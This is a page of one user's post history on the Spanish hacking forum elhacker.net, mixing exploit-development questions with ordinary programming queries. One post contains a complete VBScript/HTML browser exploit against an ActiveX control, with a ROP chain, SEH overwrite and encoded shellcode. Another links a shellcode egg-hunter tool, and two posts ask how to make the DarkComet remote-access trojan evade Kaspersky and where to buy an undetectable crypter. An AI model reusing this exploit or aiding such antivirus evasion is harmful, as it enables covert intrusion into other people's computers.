elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 39
61  Seguridad Informática / Análisis y Diseño de Malware / Consejo para evadir Kaspersky? en: 7 Abril 2014, 16:31 pm
Pues eso, que consejos me dan para evadir kaspersky, más que nada el análisis heurístico, ya que logro analizar estáticamente el ejecutable y este no es detectado, pero al iniciar es suprimido.

PD: DarkCommet


Saludos
62  Seguridad Informática / Análisis y Diseño de Malware / Crypter de pago fud de confianza? en: 2 Abril 2014, 04:08 am
Hola a todos, durante estos días he estado buscando crypter de pago, lamentablemente me llevé una mala sorpresa con uno de pago, no daré nombres por respeto al autor. Ya que no quiero repetir lo sucedido me gustaría saber si ustedes conocen algún crypter que sea fud con DarkComet, a ver si me logran ayudar.

Saludos y buenas noches
63  Programación / Desarrollo Web / Duda .httacess en: 11 Marzo 2014, 18:29 pm
Hola a todos, tengo un httacces de la siguiente forma:
Código
  1. RewriteEngine On
  2. RewriteCond %{HTTPS} off
  3. RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}

Como podrán ver fuerza las conexiones https pero me gustaría filtrar algunas web, me explico que fuerce todas las conexiones menos cuando http host es www.tienda.com, es que tengo muchos dominios y no todos tienen SSL, saludos y gracias.
64  Seguridad Informática / Bugs y Exploits / [Aporte]Resumen corelan en: 8 Marzo 2014, 18:22 pm
Adjunto un resumen que hice sobe la serie de tutoriales de CorelanC0d3r, espero que les guste, saludos:
http://www.mediafire.com/view/bpnb1dydndno2p1/Exploit_en_Windows.pdf
65  Programación / Ingeniería Inversa / Duda con Ascii Unicode, Ansi en: 8 Marzo 2014, 01:03 am
Hola a todos, llego con una nueva duda a ver si me logran aclarar:
cual es la diferencia de estos tres entiendo que ANSI se utiliza por ejemplo en
MessageBoxA y Unicode en MessageBoxW, en mis apuntes tengo lo siguiente:

ASCII: Conjunto de caracteres de 7 bits (anteriormente solían ser 8, pero se optó por eliminar un bit llamado “bit de paridad”.
ANSI: Conjunto de caracteres de 8 bits.
UNICODE: Este conjunto de caracteres posee tres formatos de codificación:
•   UTF-8: Utilizado en HTML, tiene los mismo valores de bytes que ASCII.
•   UTF-16: Conjunto de caracteres de 16 bits (Windows utiliza esta codificación).
•   UTF-32: Conjunto de caracteres de 32 bits.

Ahora mi duda ANSI?? no entiendo que es exactamente ya que lo veo idéntico a Ascii y en cuanto al apunte de UTF-16 se refiere al Unicode de windows verdad?, a ver si me aclaran todo esto que me terminé enredando, saludos.
66  Programación / Scripting / Separar un comando en múltiples líneas en VBSCRIPT en: 4 Marzo 2014, 21:58 pm
Hola a todos tengo el siguiente código pero no logro hacer que quede en líneas diferentes, a ver si me guían, saludos (es exactamente en payload):

Código
  1. <html>
  2. <object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target'></object>
  3. <script language='vbscript'>
  4. junk1 = String(72, "A")
  5. junk2 = String(3184, "B")
  6. junk3 = String(25000, "C")
  7.  
  8. nop1 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  9. nop2 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  10. nop3 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  11. nop4 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  12. nop5 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  13. nop6 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  14. nop7 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  15. nop = nop1 + nop2 + nop3 + nop4 + nop5 + nop6 + nop7
  16.  
  17. rop1 = unescape("%33%b6%44%06") ' SSHelper.dll | POP EBP / RETN
  18. rop2 = unescape("%10%c0%1f%06") ' SSHelper.dll
  19. rop3 = unescape("%65%b9%47%06") ' SSHelper.dll | MOV EDX,EBP / POP EDI / POP ESI / POP EBP / POP EBX / POP ECX / RETN
  20. rop4 = unescape("%51%a5%45%06") ' SSHelper.dll | CALL EAX
  21. rop5 = unescape("%ff%ff%ff%ff") ' 0xFFFFFFFF
  22. rop6 = unescape("%6c%c4%24%23") ' 0x2324C46C
  23. rop7 = unescape("%49%cc%ba%f9") ' 0xF9BACC49
  24. rop8 = unescape("%aa%aa%aa%aa") ' 0xAAAAAAAA
  25. rop9 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN
  26. rop10 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN
  27. rop11 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN
  28. rop12 = unescape("%0e%37%45%06") ' SSHelper.dll | MOV EAX,0x64536B7 / RETN
  29. rop13 = unescape("%d9%c4%47%06") ' SSHelper.dll | ADD EBX,EAX / PUSH 0x1 / POP EAX / RETN
  30. rop14 = unescape("%05%67%47%06") ' SSHelper.dll | POP EAX / RETN
  31. rop15 = unescape("%b0%c3%24%23") ' 0x2324C3B0
  32. rop16 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN
  33. rop17 = unescape("%71%03%4a%06") ' SSHelper.dll | PUSHAD / ADD AL,0x0 / RETN
  34. ROPgadgets = nop + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8 + rop9 + rop10 + rop11 + rop12 + rop13 + rop14 + rop15 + rop16 + rop17
  35.  
  36. SEH = unescape("%13%16%47%06") ' SSHelper.dll | ADD ESP,0x46C
  37.  
  38. payload =unescape(
  39. "%fc%e8%89%00%00%00%60%89%e5%31%d2%64%8b%52" & _
  40. "%30%8b%52%0c%8b%52%14%8b%72%28%0f%b7%4a%26" & _
  41. "%31%ff%31%c0%ac%3c%61%7c%02%2c%20%c1%cf%0d" & _
  42. "%01%c7%e2%f0%52%57%8b%52%10%8b%42%3c%01%d0" & _
  43. "%8b%40%78%85%c0%74%4a%01%d0%50%8b%48%18%8b" & _
  44. "%58%20%01%d3%e3%3c%49%8b%34%8b%01%d6%31%ff" & _
  45. "%31%c0%ac%c1%cf%0d%01%c7%38%e0%75%f4%03%7d" & _
  46. "%f8%3b%7d%24%75%e2%58%8b%58%24%01%d3%66%8b" & _
  47. "%0c%4b%8b%58%1c%01%d3%8b%04%8b%01%d0%89%44" & _
  48. "%24%24%5b%5b%61%59%5a%51%ff%e0%58%5f%5a%8b" & _
  49. "%12%eb%86%5d%6a%01%8d%85%b9%00%00%00%50%68" & _
  50. "%31%8b%6f%87%ff%d5%bb%f0%b5%a2%56%68%a6%95" & _
  51. "%bd%9d%ff%d5%3c%06%7c%0a%80%fb%e0%75%05%bb" & _
  52. "%47%13%72%6f%6a%00%53%ff%d5%63%61%6c%63%2e" & _
  53. "%65%78%65%00")
  54.  
  55. arg1 = 1
  56. arg2 = 1
  57. arg3 = junk1 + ROPgadgets + junk2 + SEH + payload + junk3
  58. arg4 = "defaultV"
  59. arg5 = "defaultV"
  60. target.SetRegString arg1, arg2, arg3, arg4, arg5
  61. </script>
  62. </html>
67  Seguridad Informática / Bugs y Exploits / w32 SEH omelet shellcode v0.2 fixed by UND3R en: 1 Marzo 2014, 16:52 pm
Parece gran cosa, pero no hace mucho les comento:
- Re-leyendo los tutoriales de corelan siempre me molestó la parte de utilizar esta herramienta ya que presentaba algunos problemas, en donde corelan propuso como solución modificar el código asm el buscador de huevos (omelet_shellcode), el problema ocurre que esta modificación se debía hacer dependiendo de la cantidad de huevos por lo que se me ocurrió por así decir hacer un omelet_shellcode genérico y en base a la cantidad de huevos que se generarán con w32_SEH_omelet.py adaptará el código de salida.

pasos anteriores a la modificación:
1.- ensamblar a binario con nasm w32_SEH_omelet.asm
2.- ejecutar la secuencia
Código:
w32_SEH_omelet.py w32_SEH_omelet.bin payload.bin output.txt [egg size]
3.- de acuerdo a la cantidad de huevos generados modificar la constante egg_size ubicada dentro de w32_SEH_omelet.asm y volver al paso 1
4.- revisar si el manejador SEH del omelet controla las excepciones al buscar en memoria, en caso contrario modificar EDI para que apunte a una dirección válida a buscar.

pasos con el fixed:
1.-
Código:
w32_SEH_omelet.py w32_SEH_omelet.bin payload.bin output.txt [egg size]
2.- revisar si el manejador SEH del omelet controla las excepciones al buscar en memoria, en caso contrario modificar EDI para que apunte a una dirección válida a buscar.

No es gran cosa, pero nada mejor que no tener que estar ensamblando cada vez que estemos armando un omelet.

Descarga:
http://www.mediafire.com/download/q5c0gbi55x91cv2/w32+SEH+omelet+shellcode+v0.2+fixed+by+UND3R.rar
68  Programación / Ingeniería Inversa / Duda con Immunity Debugger (hex to ascii) en: 28 Febrero 2014, 00:14 am
Como logro convertir un hex a ascii desde este debugger a través de línea de comando?, saludos y gracias
69  Seguridad Informática / Bugs y Exploits / Como verificar si mi payload está deñada en: 21 Febrero 2014, 00:18 am
Me explico, al momento inyectar un payload en memoria, en algunas vulnerabilidades queda incompleto, por lo cual debo comparar byte por byte, algo muy tedioso, ¿De qué manera se puede verificar un payload en memoria?

Saludos y gracias
70  Programación / Ingeniería Inversa / Feliz San Valentín en: 14 Febrero 2014, 20:34 pm
Quería desearles a cada uno de ustedes un feliz y lindo San Valentín. Este subforo ya dejo hace tiempo de ser un subforo más, se ha formado una gran familia de sabios, eruditos, colaboradores, aprendices, interesados y visitantes. Cada participante de esta familia hace día a día lo que este subforo es, una fuente de ayuda y de entretención que lo convierte en algo mágico.





 ;-)
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 39
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines